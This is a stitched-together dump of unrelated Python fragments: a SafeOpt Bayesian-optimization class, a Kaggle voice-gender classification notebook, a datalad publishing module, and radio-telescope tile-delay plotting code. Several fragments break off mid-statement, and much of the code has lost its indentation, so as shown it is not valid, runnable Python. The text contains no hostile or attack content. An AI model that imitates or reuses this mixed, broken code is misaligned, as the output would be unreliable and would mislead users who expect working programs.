elif beta_dict["style"] == "srinivas":
print("Srinivas-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
noise_variance = beta_dict["noise_variance"]
card_D = beta_dict["card_D"]
beta = lambda t: math.sqrt(2 * B + 300 * card_D * math.log(1 + (R ** -2) * t * card_D *
np.amax(np.diag(self.gp.kern.K(parameter_set,
parameter_set)))) * \
math.log(t / delta) ** 3)
else:
print("No beta assigned! beta = 2 is used")
beta = 2
self.safety = beta_dict["safety"]
self.index_x0 = beta_dict["index_x0"]
self.y0 = beta_dict["y0"]
self.R = beta_dict["R"]
super(SafeOpt, self).__init__(gp,
fmin=fmin,
beta=beta,
num_contexts=num_contexts,
threshold=threshold,
scaling=scaling)
if self.num_contexts > 0:
context_shape = (parameter_set.shape[0], self.num_contexts)
self.inputs = np.hstack((parameter_set,
np.zeros(context_shape,
dtype=parameter_set.dtype)))
self.parameter_set = self.inputs[:, :-self.num_contexts]
else:
self.inputs = self.parameter_set = parameter_set
self.liptschitz = lipschitz
if self.liptschitz is not None:
if not isinstance(self.liptschitz, list):
self.liptschitz = [self.liptschitz] * len(self.gps)
self.liptschitz = np.atleast_1d(
np.asarray(self.liptschitz).squeeze())
# Value intervals
self.Q = np.empty((self.inputs.shape[0], 2 * len(self.gps)),
dtype=np.float)
# Safe set
self.S = np.zeros(self.inputs.shape[0], dtype=np.bool)
self.S_x0 = self.S.copy()
self.S_x0[self.index_x0] = 1
# Switch to use confidence intervals for safety
if lipschitz is None:
self._use_lipschitz = False
else:
self._use_lipschitz = True
# Set of expanders and maximizers
self.G = self.S.copy()
self.M = self.S.copy()
self.last_y = self.y0.flatten()
self.last_x_index = self.index_x0
    @property
    def use_lipschitz(self):
        """
        Boolean that determines whether to use the Lipschitz constant.

        By default this is set to False, which means the adapted SafeOpt
        algorithm is used, that uses the GP confidence intervals directly.
        If set to True, the `self.lipschitz` parameter is used to compute
        the safe and expanders sets.
        """
        return self._use_lipschitz

    @use_lipschitz.setter
    def use_lipschitz(self, value):
        """Enable/disable Lipschitz-based set computation.

        Raises:
            ValueError: If enabling while no Lipschitz constant was given.
        """
        # NOTE: 'liptschitz' (sic) is the attribute name this class sets in
        # __init__ and reads throughout.
        if value and self.liptschitz is None:
            raise ValueError('Lipschitz constant not defined')
        self._use_lipschitz = value
    @property
    def parameter_set(self):
        """Discrete parameter samples for Bayesian optimization."""
        return self._parameter_set

    @parameter_set.setter
    def parameter_set(self, parameter_set):
        """Store the sample grid and refresh derived plotting metadata."""
        self._parameter_set = parameter_set
        # Plotting bounds: one (min, max) pair per input dimension.
        self.bounds = list(zip(np.min(self._parameter_set, axis=0),
                               np.max(self._parameter_set, axis=0)))
        # Number of distinct sample values along each input dimension
        # (used when reshaping for plots).
        self.num_samples = [len(np.unique(self._parameter_set[:, i]))
                            for i in range(self._parameter_set.shape[1])]
    @property
    def context_fixed_inputs(self):
        """Return the fixed inputs for the current context.

        Returns (dimension index, context value) pairs for the trailing
        context columns, or implicitly ``None`` when there are no contexts.
        """
        n = self.gp.input_dim - 1
        nc = self.num_contexts
        if nc > 0:
            # Context variables occupy the trailing columns of the inputs.
            contexts = self.inputs[0, -self.num_contexts:]
            return list(zip(range(n, n - nc, -1), contexts))

    @property
    def context(self):
        """Return the current context variables.

        Implicitly returns ``None`` when no contexts are configured.
        """
        if self.num_contexts:
            return self.inputs[0, -self.num_contexts:]

    @context.setter
    def context(self, context):
        """Set the current context and update confidence intervals.

        Parameters
        ----------
        context: ndarray
            New context that should be applied to the input parameters

        Raises
        ------
        ValueError
            If contexts are configured but ``context`` is None.
        """
        if self.num_contexts:
            if context is None:
                raise ValueError('Need to provide value for context.')
            # Broadcast the context into the trailing columns of every row.
            self.inputs[:, -self.num_contexts:] = context
def update_confidence_intervals(self, context=None):
"""Recompute the confidence intervals form the GP.
Parameters
----------
context: ndarray
Array that contains the context used to compute the sets
"""
beta = self.beta(self.t)
# print("Current beta for updating confidence intervals: ", beta)
# Update context to current setting
self.context = context
# Iterate over all functions
for i in range(len(self.gps)):
# Evaluate acquisition function
mean, var = self.gps[i].predict_noiseless(self.inputs)
mean = mean.squeeze()
std_dev = np.sqrt(var.squeeze())
# Update confidence intervals
self.Q[:, 2 * i] = mean - beta * std_dev
self.Q[:, 2 * i + 1] = mean + beta * std_dev
    def compute_safe_set(self):
        """Compute only the safe set based on the current confidence bounds.

        Which rule is applied depends on ``self.safety``:
        "modified" uses the GP lower bounds directly, "lipschitz" expands
        from all currently safe points via the Lipschitz constant, and
        "pure-lipschitz" expands only from the last observation.
        """
        # Update safe set
        if self.safety == "modified":
            # A point is safe when the lower bound of every GP exceeds fmin.
            self.S[:] = np.all(self.Q[:, ::2] > self.fmin, axis=1)
        if self.safety == "lipschitz":
            # This implementation does only work for SafeOpt with just a performance constraint (and not additional constraints)!
            # Candidates = points that are neither currently safe nor the seed.
            next_points_arr = np.logical_not(np.logical_or(self.S, self.S_x0))
            next_points_indices = np.nonzero(next_points_arr)[0]
            S_extended = np.logical_or(self.S, self.S_x0)
            safe_points_indices = np.nonzero(S_extended)[0]
            for index in safe_points_indices:
                # A candidate is safe if the lower bound at a known safe point
                # minus the worst-case Lipschitz decrease over the distance
                # still clears the safety threshold fmin.
                delta_S = np.where(
                    self.Q[:, 0][index] - self.liptschitz[0] * np.linalg.norm(
                        self.inputs[index] - self.inputs[next_points_indices],
                        axis=1) >= self.fmin[0], 1,
                    0)
                self.S[next_points_indices] = np.logical_or(self.S[next_points_indices], delta_S)
        if self.safety == "pure-lipschitz":
            # This implementation does only work with just a performance constraint (and not additional constraints)!
            next_points_arr = np.logical_not(np.logical_or(self.S, self.S_x0))
            next_points_indices = np.nonzero(next_points_arr)[0]
            # Expand only from the most recent observation, using its value
            # minus the noise bound R as a conservative lower bound.
            delta_S = np.where(
                self.last_y - self.R - self.liptschitz[0] * np.linalg.norm(
                    self.inputs[self.last_x_index] - self.inputs[next_points_indices],
                    axis=1) >= self.fmin[0], 1,
                0)
            # NOTE(review): unlike the "lipschitz" branch this overwrites
            # (rather than ORs into) the candidate entries of S -- confirm
            # that dropping previously marked candidates is intended.
            self.S[next_points_indices] = delta_S
def compute_sets(self, full_sets=False):
"""
Compute the safe set of points, based on current confidence bounds.
Parameters
----------
context: ndarray
Array that contains the context used to compute the sets
full_sets: boolean
Whether to compute the full set of expanders or whether to omit
computations that are not relevant for running SafeOpt
(This option is only useful for plotting purposes)
"""
beta = self.beta(self.t)
# print("Current beta for computing safe set: ", beta)
# Update safe set
self.compute_safe_set()
# Reference to confidence intervals
l, u = self.Q[:, :2].T
if not np.any(self.S):
self.M[:] = False
self.G[:] = False
return
# Set of possible maximisers
# Maximizers: safe upper bound above best, safe lower bound
self.M[:] = False
self.M[self.S] = u[self.S] >= np.max(l[self.S])
max_var = np.max(u[self.M] - l[self.M]) / self.scaling[0]
# Optimistic set of possible expanders
l = self.Q[:, ::2]
u = self.Q[:, 1::2]
self.G[:] = False
# For the run of the algorithm we do not need to calculate the
# full set of potential expanders:
# We can skip the ones already in M and ones that have lower
# variance than the maximum variance in M, max_var or the threshold.
# Amongst the remaining ones we only need to find the
# potential expander with maximum variance
if full_sets:
s = self.S
else:
# skip points in M, they will already be evaluated
s = np.logical_and(self.S, ~self.M)
# Remove points with a variance that is too small
s[s] = (np.max((u[s, :] - l[s, :]) / self.scaling, axis=1) >
max_var)
s[s] = np.any(u[s, :] - l[s, :] > self.threshold * beta, axis=1)
if not np.any(s):
# no need to evaluate any points as expanders in G, exit
return
def sort_generator(array):
"""Return the sorted array, largest element first."""
return array.argsort()[::-1]
# set of safe expanders
G_safe = np.zeros(np.count_nonzero(s), dtype=np.bool)
if not full_sets:
# Sort, element with largest variance first
sort_index = sort_generator(np.max(u[s, :] - l[s, :],
axis=1))
else:
# Sort index is just an enumeration of all safe states
sort_index = range(len(G_safe))
for index in sort_index:
if self.use_lipschitz:
# Distance between current index point and all other unsafe
# points
d = cdist(self.inputs[s, :][[index], :],
self.inputs[~self.S, :])
# Check if expander for all GPs
for i in range(len(self.gps)):
# Skip evaluation if 'no' safety constraint
if self.fmin[i] == -np.inf:
continue
# Safety: u - L * d >= fmin
G_safe[index] = | |
#!/usr/bin/env python
# coding: utf-8
# # Gender Recognition by Voice Kaggle [ Test Accuracy : 99.08 % ]
# In[ ]:
# ## CONTENTS::
# [ **1 ) Importing Various Modules and Loading the Dataset**](#content1)
# [ **2 ) Exploratory Data Analysis (EDA)**](#content2)
# [ **3 ) OutlierTreatment**](#content3)
# [ **4 ) Feature Engineering**](#content4)
# [ **5 ) Preparing the Data**](#content5)
# [ **6 ) Modelling**](#content6)
# [ **7 ) Parameter Tuning with GridSearchCV**](#content7)
# In[ ]:
# ## 1.1 ) Importing Various Modules
# In[ ]:
# Ignore the warnings
import warnings
warnings.filterwarnings('always')
warnings.filterwarnings('ignore')
# data visualisation and manipulation
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
import seaborn as sns
import missingno as msno
#configure
# sets matplotlib to inline and displays graphs below the corressponding cell.
style.use('fivethirtyeight')
sns.set(style='whitegrid',color_codes=True)
#import the necessary modelling algos.
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn import datasets
from sklearn.naive_bayes import GaussianNB
#model selection
from sklearn.model_selection import train_test_split
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score,precision_score,recall_score,confusion_matrix,roc_curve,roc_auc_score
from sklearn.model_selection import GridSearchCV
#preprocess.
from sklearn.preprocessing import MinMaxScaler,StandardScaler,Imputer,LabelEncoder,OneHotEncoder
# ## 1.2 ) Loading the Dataset
# In[ ]:
train=pd.read_csv(r"../../../input/primaryobjects_voicegender/voice.csv")
# In[ ]:
train.head(10)
# <a id="content2"></a>
# ## 2 ) Exploratory Data Analysis (EDA)
# ## 2.1 ) The Features and the 'Target' variable
# In[ ]:
df=train.copy()
# In[ ]:
df.head(10)
# In[ ]:
df.shape
# In[ ]:
df.index
# In[ ]:
df.columns # give a short description of each feature.
# **#A short description as on 'Data' tab on kaggle is :**
# ####
#
# **meanfreq**: mean frequency (in kHz)
#
# **sd**: standard deviation of frequency
#
# **median**: median frequency (in kHz)
#
# **Q25**: first quantile (in kHz)
#
# **Q75**: third quantile (in kHz)
#
# **IQR**: interquantile range (in kHz)
#
# **skew**: skewness (see note in specprop description)
#
# **kurt**: kurtosis (see note in specprop description)
#
# **sp.ent**: spectral entropy
#
# **sfm**: spectral flatness
#
# **mode**: mode frequency
#
# **centroid**: frequency centroid (see specprop)
#
# **peakf**: peak frequency (frequency with highest energy)
#
# **meanfun**: average of fundamental frequency measured across acoustic signal
#
# **minfun**: minimum fundamental frequency measured across acoustic signal
#
# **maxfun**: maximum fundamental frequency measured across acoustic signal
#
# **meandom**: average of dominant frequency measured across acoustic signal
#
# **mindom**: minimum of dominant frequency measured across acoustic signal
#
# **maxdom**: maximum of dominant frequency measured across acoustic signal
#
# **dfrange**: range of dominant frequency measured across acoustic signal
#
# **modindx**: modulation index. Calculated as the accumulated absolute difference between adjacent measurements of fundamental frequencies divided by the frequency range
#
# **label**: male or female
# #### Note that we have 3168 voice samples and for each of sample 20 different acoustic properties are recorded. Finally the 'label' column is the target variable which we have to predict which is the gender of the person.
# ## 2.2 ) Missing Values Treatment
# In[ ]:
# check for null values.
df.isnull().any()
# In[ ]:
msno.matrix(df) # just to visualize. no missing value.
# ## 2.3 ) Univariate Analysis
# In this section I have performed the univariate analysis. Note that since all of the features are 'numeric' the most reasonable way to plot them would either be a 'histogram' or a 'boxplot'.
#
# Also note that univariate analysis is useful for outlier detection. Hence besides plotting a boxplot and a histogram for each column or feature, I have written a small utility function which tells the remaining no of observations for each feature if we remove its outliers.
# #### To detect the outliers I have used the standard 1.5 InterQuartileRange (IQR) rule which states that any observation lesser than 'first quartile - 1.5 IQR' or greater than 'third quartile +1.5 IQR' is an outlier.
# In[ ]:
df.describe()
# In[ ]:
def calc_limits(feature):
    """Return the (lower, upper) outlier fences for *feature*.

    Uses the standard 1.5*IQR rule on the module-level DataFrame ``df``.
    """
    q1, q3 = df[feature].quantile([0.25, 0.75])
    spread = 1.5 * (q3 - q1)
    return q1 - spread, q3 + spread
# In[ ]:
def plot(feature):
    """Draw a box plot and distribution plot for *feature*, and report how
    many observations would survive 1.5*IQR outlier removal.

    Args:
        feature: Column name in the module-level DataFrame ``df``.
    """
    fig, axes = plt.subplots(1, 2)
    sns.boxplot(data=df, x=feature, ax=axes[0])
    sns.distplot(a=df[feature], ax=axes[1], color='#ff4125')
    fig.set_size_inches(15, 5)
    lower, upper = calc_limits(feature)
    # BUG FIX: the original comprehension appended the entire Series
    # (df[feature]) once per in-range value; we want the values themselves.
    # The printed count was coincidentally correct, the contents were not.
    l = [i for i in df[feature] if lower < i < upper]
    print("Number of data points remaining if outliers removed : ", len(l))
# In[ ]:
plot('meanfreq')
# #### INFERENCES FROM THE PLOT--
#
# 1) First of all note that the values are in compliance with that observed from describe method data frame..
#
# 2) Note that we have a couple of outliers w.r.t. the 1.5 IQR rule (represented by a 'dot' in the box plot). Removing these data points or outliers leaves us with around 3104 values.
#
# 3) Also note from the distplot that the distribution seems to be a bit -ve skewed hence we can normalize to make the distribution a bit more symmetric.
#
# 4) LASTLY NOTE THAT A LEFT TAIL DISTRIBUTION HAS MORE OUTLIERS ON THE SIDE BELOW TO Q1 AS EXPECTED AND A RIGHT TAIL HAS ABOVE THE Q3.
# #### Similar other plots can be inferenced.
# In[ ]:
plot('sd')
# In[ ]:
plot('median')
# In[ ]:
plot('Q25')
# In[ ]:
plot('IQR')
# In[ ]:
plot('skew')
# In[ ]:
plot('kurt')
# In[ ]:
plot('sp.ent')
# In[ ]:
plot('sfm')
# In[ ]:
plot('meanfun')
# In[ ]:
sns.countplot(data=df,x='label')
# In[ ]:
df['label'].value_counts()
# #### Note that we have equal no of observations for the 'males' and the 'females'. Hence it is a balanced class problem.
# ## 2.4 ) Bivariate Analysis
# ## 2.4.1 ) Correlation b/w Features
# In this section I have analyzed the corelation between different features. To do it I have plotted a 'heat map' which clearly visulizes the corelation between different features.
# In[ ]:
# Encode the target column: 'male' -> 1, 'female' (anything else) -> 0.
# A comprehension replaces the manual temp-list append loop; values are
# identical to the original encoding.
df['label'] = [1 if i == 'male' else 0 for i in df.label]
# In[ ]:
#corelation matrix.
cor_mat = df[:].corr()
# Mask out the lower triangle so each correlation is shown only once.
mask = np.array(cor_mat)
mask[np.tril_indices_from(mask)] = False
fig = plt.gcf()
fig.set_size_inches(30, 12)
# BUG FIX: the mask and figure sizing were computed but the heatmap itself
# was never drawn, although the following comments analyze "the above
# heatmap". Render it.
sns.heatmap(data=cor_mat, mask=mask, square=True, annot=True, cbar=True)
# #### SOME INFERENCES FROM THE ABOVE HEATMAP--
#
# 1) Mean frequency is moderately related to label.
#
# 2) IQR and label tend to have a strong positive corelation.
#
# 3) Spectral entropy is also quite highly corelated with the label while sfm is moderately related with label.
#
# 4) skewness and kurtosis aren't much related with label.
#
# 5) meanfun is highly negatively corelated with the label.
#
# 6) Centroid and median have a high positive corelationas expected from their formulae.
#
# 7) ALSO NOTE THAT MEANFREQ AND CENTROID ARE EXACTLY SAME FEATURES AS PER FORMULAE AND VALUES ALSO. HENCE THEIR CORELATION IS PERFCET 1. IN THAT CASE WE CAN DROP ANY COLUMN. note that centroid in general has a high degree of corelation with most of the other features.
#
# SO I WILL DROP THE 'CENTROID' COLUMN.
#
# 8) sd is highly positively related to sfm and so is sp.ent to sd.
#
# 9) kurt and skew are also highly corelated.
#
# 10) meanfreq is highly related to median as well as Q25.
#
# 11) IQR is highly corelated to sd.
#
# 12) Finally self relation ie of a feature to itself is equal to 1 as expected.
# #### Note that we can drop some highly corelated features as they add redundancy to the model but let us keep all the features for now. In case of highly corelated features we can use dimensionality reduction techniques like Principal Component Analysis(PCA) to reduce our feature space.
# In[ ]:
df.drop('centroid',axis=1,inplace=True)
# ## 2.4.2 ) Plotting the Features against the 'Target' variable
# Here I have just written a small utility function that plots the 'label' column vs the provided feature on a boxplot. In this way I have plotted some of the features against our target variable. This makes it easier to see the effect of the corressponding feature on the 'label'.
# In[ ]:
# drawing features against the target variable.
def plot_against_target(feature):
    """Box-plot *feature* grouped by the binary 'label' column of ``df``.

    Args:
        feature: Column name in the module-level DataFrame ``df``.

    NOTE(review): ``sns.factorplot`` was renamed to ``catplot`` in
    seaborn 0.9 and later removed -- confirm the pinned seaborn version.
    """
    sns.factorplot(data=df,y=feature,x='label',kind='box')
    fig=plt.gcf()
    fig.set_size_inches(7,7)
# In[ ]:
plot_against_target('meanfreq') # 0 for females and 1 for males.
# #### INFERENCES--
#
# 1) Firstly note that 0->'female' and 1->'male'.
#
# 2) Note that the boxpot depicts that the females in genral have higher mean frequencies than their male counterparts and which is a generally accepted fact.
# #### Again similar inferences can be drawn.
# In[ ]:
plot_against_target('sd')
# In[ ]:
plot_against_target('median')
# In[ ]:
plot_against_target('Q25')
# In[ ]:
plot_against_target('IQR')
# #### Note here that there is a remarkable difference b/w the inter quartile ranges of males and females.This is evident from the strong relation between 'label' and the 'IQR' in the heatmap plotted above.
# In[ ]:
plot_against_target('sp.ent')
# In[ ]:
plot_against_target('sfm')
# In[ ]:
plot_against_target('meanfun')
# #### Again high difference in females and males mean fundamental frequency. This | |
<gh_stars>0
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""High-level interface for dataset (component) publishing
"""
import logging
import re
from collections import OrderedDict
from os.path import curdir
from os.path import sep as dirsep
from datalad.interface.base import Interface
from datalad.interface.base import build_doc
from datalad.interface.utils import filter_unmodified
from datalad.interface.common_opts import annex_copy_opts, recursion_flag, \
recursion_limit, git_opts, annex_opts, jobs_opt
from datalad.interface.common_opts import missing_sibling_opt
from datalad.support.param import Parameter
from datalad.support.constraints import EnsureStr
from datalad.support.constraints import EnsureNone
from datalad.support.annexrepo import AnnexRepo
from datalad.support.exceptions import InsufficientArgumentsError
from datalad.support.exceptions import CommandError
from datalad.utils import assure_list
from datalad.dochelpers import exc_str
from .dataset import EnsureDataset
from .dataset import Dataset
from .dataset import datasetmethod
from .dataset import require_dataset
__docformat__ = 'restructuredtext'
lgr = logging.getLogger('datalad.distribution.publish')
# TODO: make consistent configurable output
def _log_push_info(pi_list, log_nothing=True):
    """Log the outcome of a git push and report whether any ref failed.

    Parameters
    ----------
    pi_list : list
      PushInfo instances as returned by GitPython's push().
    log_nothing : bool
      Whether to emit a debug message when there was nothing to push.

    Returns
    -------
    bool
      True if at least one pushed ref reported an error.
    """
    from git.remote import PushInfo as PI
    error = False
    if not pi_list:
        if log_nothing:
            lgr.debug("Pushed: nothing")
        return error
    for info in pi_list:
        if (info.flags & PI.ERROR) == PI.ERROR:
            lgr.debug('Push failed: %s', info.summary)
            error = True
        else:
            lgr.debug('Pushed: %s', info.summary)
    return error
def _publish_dataset(ds, remote, refspec, paths, annex_copy_options, force=False, jobs=None):
# TODO: this setup is now quite ugly. The only way `refspec` can come
# in, is when there is a tracking branch, and we get its state via
# `refspec`
is_annex_repo = isinstance(ds.repo, AnnexRepo)
def _publish_data():
if ds.repo.is_remote_annex_ignored(remote):
return [], [] # Cannot publish any data
try:
remote_wanted = ds.repo.get_preferred_content('wanted', remote)
except CommandError as exc:
if "cannot determine uuid" in str(exc):
if not ds.repo.is_remote_annex_ignored(remote):
lgr.warning(
"Annex failed to determine UUID, skipping publishing data for now: %s",
exc_str(exc)
)
return [], []
raise
if (paths or annex_copy_options or remote_wanted) and is_annex_repo:
lgr.info("Publishing {0} data to {1}".format(ds, remote))
# overwrite URL with pushurl if any, reason:
# https://git-annex.branchable.com/bugs/annex_ignores_pushurl_and_uses_only_url_upon___34__copy_--to__34__/
# Note: This shouldn't happen anymore with newly added siblings.
# But for now check for it, until we agree on how to fix existing
# ones.
pushurl = ds.config.get('remote.{}.pushurl'.format(remote), None)
annexurl = ds.config.get('remote.{}.annexurl'.format(remote), None)
annex_copy_options_ = annex_copy_options or ''
if pushurl and not annexurl:
annex_copy_options_ += ' -c "remote.{}.annexurl={}"'.format(remote, pushurl)
if not paths and remote_wanted:
lgr.debug("Invoking copy --auto")
annex_copy_options_ += ' --auto'
# TODO: we might need additional logic comparing the state of git-annex
# branch locally and on remote to see if information about the 'copy'
# was also reflected on the remote end
#git_annex_hexsha = ds.repo.get_hexsha('git-annex')
# TODO: must be the same if we merged/pushed before, if not -- skip
# special logic may be with a warning
if not force:
# if we force, we do not trust local knowledge and do the checks
annex_copy_options_ += ' --fast'
pblshd = ds.repo.copy_to(
files=paths,
remote=remote,
options=annex_copy_options_,
jobs=jobs
)
# if ds.submodules:
# # NOTE: we might need to init them on the remote, but needs to
# # be done only if remote is sshurl and it is not bare there
# # (which I think we do not even support ATM)...
# # or we could do that in the hook, as it is done for now
# # (see create_sibling.py)
# #
# pass
# if ds.repo.get_hexsha('git-annex') != git_annex_hexsha:
# # there were changes which should be pushed
# lgr.debug(
# "We have progressed git-annex branch should fetch/merge/push it to %s again",
# remote)
# ds.repo.fetch(remote=remote, refspec='git-annex')
# ds.repo.merge_annex(remote)
# _log_push_info(ds.repo.push(remote=remote, refspec=['git-annex']))
return pblshd
else:
return []
# Plan:
# 1. Check if there is anything to push, and if so
# 2. process push dependencies
# 3. fetch and merge annex branch
# 4. push non-annex branch(es)
# 5. copy data to the remote if paths are provided or it wants something generally
published, skipped = [], []
# upstream refspec needed for update (merge) and subsequent push,
# in case there is no.
# no tracking refspec yet?
if force:
# if forced -- we push regardless if there are differences or not
diff = True
# check if there are any differences wrt the to-be-published paths,
# and if not skip this dataset
else:
if refspec:
remote_branch_name = refspec[11:] \
if refspec.startswith('refs/heads/') \
else refspec
else:
# there was no tracking branch, check the push target
remote_branch_name = ds.repo.get_active_branch()
diff = _get_remote_diff(ds, paths, None, remote, remote_branch_name)
# We might have got new information in git-annex branch although no other
# changes
if not diff and is_annex_repo:
try:
git_annex_commit = next(ds.repo.get_branch_commits('git-annex'))
except StopIteration:
git_annex_commit = None
diff = _get_remote_diff(ds, [], git_annex_commit, remote, 'git-annex')
if diff:
lgr.info("Will publish updated git-annex")
# # remote might be set to be ignored by annex, or we might not even know yet its uuid
# annex_ignore = ds.config.getbool('remote.{}.annex-ignore'.format(remote), None)
# annex_uuid = ds.config.get('remote.{}.annex-uuid'.format(remote), None)
# if not annex_ignore:
# if annex_uuid is None:
# # most probably not yet 'known' and might require some annex
knew_remote_uuid = None
if is_annex_repo and not ds.repo.is_remote_annex_ignored(remote):
try:
ds.repo.get_preferred_content('wanted', remote) # could be just checking config.remote.uuid
knew_remote_uuid = True
except CommandError:
knew_remote_uuid = False
if knew_remote_uuid:
# we can try publishing right away
published += _publish_data()
if not diff:
lgr.debug("No changes detected with respect to state of '%s'", remote)
# there could still be paths to be copied
else:
# publishing of `remote` might depend on publishing other
# remote(s) first:
# define config var name for potential publication dependencies
depvar = 'remote.{}.datalad-publish-depends'.format(remote)
for d in assure_list(ds.config.get(depvar, [])):
lgr.info("Dependency detected: '%s'" % d)
# call this again to take care of the dependency first,
# but keep the paths the same, as the goal is to publish those
# to the primary remote, and not anything elase to a dependency
pblsh, skp = _publish_dataset(
ds,
d,
None,
paths,
annex_copy_options,
force=force,
jobs=jobs
)
published.extend(pblsh)
skipped.extend(skp)
if is_annex_repo and \
ds.repo.is_special_annex_remote(remote):
# There is nothing else to "publish"
lgr.debug(
"{0} is a special annex remote, no git push is needed".format(remote)
)
return published, skipped
lgr.info("Publishing {0} to {1}".format(ds, remote))
# in order to be able to use git's config to determine what to push,
# we need to annex merge first. Otherwise a git push might be
# rejected if involving all matching branches for example.
# Once at it, also push the annex branch right here.
if is_annex_repo:
lgr.debug("Obtain remote annex info from '%s'", remote)
ds.repo.fetch(remote=remote)
ds.repo.merge_annex(remote)
# Note: git's push.default is 'matching', which doesn't work for first
# time publication (a branch, that doesn't exist on remote yet)
# But if we want to respect remote.*.push entries, etc. we need to
# not pass a specific refspec (like active branch) to `git push`
# by default.
# hence we amend any existing config on the fly
# TODO: what else to push by default?
# consider also: --follow-tags, --tags, --atomic
# make sure we push
things2push = []
current_branch = ds.repo.get_active_branch()
if current_branch: # possibly make this conditional on a switch
# TODO: this should become it own helper
if is_annex_repo:
# annex could manage this branch
if current_branch.startswith('annex/direct') \
and ds.config.getbool('annex', 'direct', default=False):
# this is a "fake" annex direct mode branch
# we want to publish the underlying branch
current_branch = current_branch[12:]
match_adjusted = re.match(
'adjusted/(.*)\([a-z]*\)',
current_branch)
if match_adjusted:
# adjusted/master(...)
# TODO: this code is not tested
# see https://codecov.io/gh/datalad/datalad/src/17e67045a088ae0372b38aa4d8d46ecf7c821cb7/datalad/distribution/publish.py#L156
# and thus probably broken -- test me!
current_branch = match_adjusted.group(1)
things2push.append(current_branch)
if is_annex_repo:
things2push.append('git-annex')
# check that all our magic found valid branches
things2push = [t for t in things2push if t in ds.repo.get_branches()]
# check that we don't ask to push things that are already configured
# -> would cause error
# TODO need to find a way to properly do this, when wildcards are used
# in the push configuration variable
things2push = [t for | |
= vpython.rotate(north, angle=(el * math.pi / 180.0),
axis=v(1, 0, 0)) # Rotate up (around E/W axis) by 'el' degrees
pvector = vpython.rotate(t1, angle=(-az * math.pi / 180.0),
axis=v(0, 0, 1)) # Rotate clockwise by 'az' degrees around 'up' axis
parrow = vpython.arrow(pos=v(0, 0, 0), axis=pvector, color=color.yellow, length=20.0, shaftwidth=1.0, visible=True)
ilist = []
alist = []
dlist = []
for bfid in pointing.HEXD:
for dipid in pointing.HEXD:
# Arrow lengths are negative if delays are positive, and vice/versa
if delays:
idealdelay = delays[bfid][dipid] * pointing.C
ilist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=-idealdelay,
color=color.white,
shaftwidth=0.2,
visible=ivis))
if idelays[bfid][dipid] != 16: # If this dipole isn't disabled
actualdelay = ((idelays[bfid][dipid] * pointing.MSTEP) + (idelays['K'][bfid] * pointing.KSTEP)) * pointing.C
alist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=-actualdelay,
color=color.green,
shaftwidth=0.2,
visible=avis))
delaydifference = idealdelay - actualdelay
dlist.append(vpython.arrow(pos=v(*offsets[bfid][dipid]),
axis=pvector,
length=100 * delaydifference,
color=color.red,
shaftwidth=0.2,
visible=dvis))
return parrow, ilist, alist, dlist
def get_sweet_delays(az=0.0, el=0.0, maxsigma=None):
    """
    (Written by <NAME>, copied with minor changes from single_observation.py)
    Return the grid ("sweet-spot") pointing nearest to the requested
    (az, el) position, optionally rejecting grid points whose "sigma"
    column exceeds *maxsigma*.
    :param az: target Az (deg)
    :param el: target El (deg)
    :param maxsigma: maximum sigma or None
    :return: azimuth, elevation, delays (all None if nothing matched)
    """
    best = None
    best_sep = 180  # degrees; acos() below can never exceed this
    for entry in GRID_POINTS:
        _number, gaz, gel, gsigma, _gdelays = entry
        if maxsigma is not None and gsigma > maxsigma:
            continue  # filtered out by the sigma cut
        # Unit vectors for the target and this grid pointing
        tx = math.cos(az * math.pi / 180.0) * math.cos(el * math.pi / 180.0)
        ty = math.sin(az * math.pi / 180.0) * math.cos(el * math.pi / 180.0)
        tz = math.sin(el * math.pi / 180.0)
        gx = math.cos(gaz * math.pi / 180.0) * math.cos(gel * math.pi / 180.0)
        gy = math.sin(gaz * math.pi / 180.0) * math.cos(gel * math.pi / 180.0)
        gz = math.sin(gel * math.pi / 180.0)
        # Clamp the dot product into acos()'s domain before taking the angle
        dot = tx * gx + ty * gy + tz * gz
        if dot > 1:
            dot = 1
        elif dot < -1:
            dot = -1
        sep = math.acos(dot) * 180.0 / math.pi
        if sep < best_sep:
            best_sep = sep
            best = entry
    if best is None:
        if maxsigma is None:
            print('No grid pointings matched')
        else:
            print('No grid pointings matched grid with maxsigma=%.1e' % maxsigma)
        return None, None, None
    _number, gaz, gel, _gsigma, gdelays = best
    return gaz, gel, gdelays
def gettiledelays(cpos=None, az=0.0, el=90.0):
"""
Copied from function calc_delays in obssched/pycontroller.py, with
code to create the actual arrow objects added. If cpos is given, it's
used as the tile centre position - use this when showing more than one
tile.
Algorithm copied from ObsController.java and converted to Python
This function takes in an azimuth and zenith angle as
inputs and creates and returns a 16-element byte array for
delayswitches which have values corresponding to each
dipole in the tile having a maximal coherent amplitude in the
desired direction.
This will return null if the inputs are
out of physical range (if za is bigger than 90) or
if the calculated switches for the dipoles are out
of range of the delaylines in the beamformer.
azimuth of 0 is north and it increases clockwise
zenith angle is the angle down from zenith
These angles should be given in degrees
Layout of the dipoles on the tile:
N
0 1 2 3
4 5 6 7
W E
8 9 10 11
12 13 14 15
S
"""
if cpos is None:
cpos = v(0, 0, 0)
elif type(cpos) == tuple:
cpos = v(cpos)
# Find the delay values for the nearest sweetspot, to use for green arrows:
sweetaz, sweetel, sweetdelays = get_sweet_delays(az=az, el=el)
# Calculate the geometric delays for the ax/el given, without using sweetspot
dip_sep = 1.10 # dipole separations in meters
delaystep = 435.0 # Delay line increment in picoseconds
maxdelay = 31 # Maximum number of deltastep delays
c = 0.000299798 # C in meters/picosecond
dtor = math.pi / 180.0 # convert degrees to radians
# define zenith angle
za = 90 - el
